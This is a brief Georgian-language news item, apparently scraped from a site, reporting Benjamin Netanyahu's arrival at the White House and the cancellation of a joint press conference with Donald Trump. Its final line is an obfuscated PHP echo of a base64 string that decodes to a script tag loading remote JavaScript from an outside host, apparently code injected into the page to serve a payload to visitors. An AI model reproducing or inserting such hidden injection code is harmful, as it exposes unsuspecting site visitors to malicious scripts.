gorgia
ავერსი jaluzi

 ისრაელის პრემიერ-მინისტრი, ბენიამინ ნეთანიაჰუ თეთრ სახლში მივიდა, - ამის შესახებ ინფორმაციას გამოცემა The Times of Israel-ი ავრცელებს.

თეთრი სახლის ინფორმაციით, აშშ-ს პრეზიდენტს, დონალდ ტრამპსა და ისრაელის პრემიერ-მინისტრს, ბენიამინ ნეთანიაჰუს შეხვედრის შემდეგ დაგეგმილი პრესკონფერენცია აღარ გაიმართება.

აშშ-ის პრეზიდენტის ადმინისტრაციაში განაცხადეს, რომ ლიდერები პრესის წინაშე კომენტარებს ოვალური კაბინეტიდან გააკეთებენ.

გავრცელებული ინფორმაციით, მხარეები ტარიფებსა და სხვა საკითხებს, მათ შორის ირანსა და ღაზაში არსებულ ვითარებას განიხილავენ.

161
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");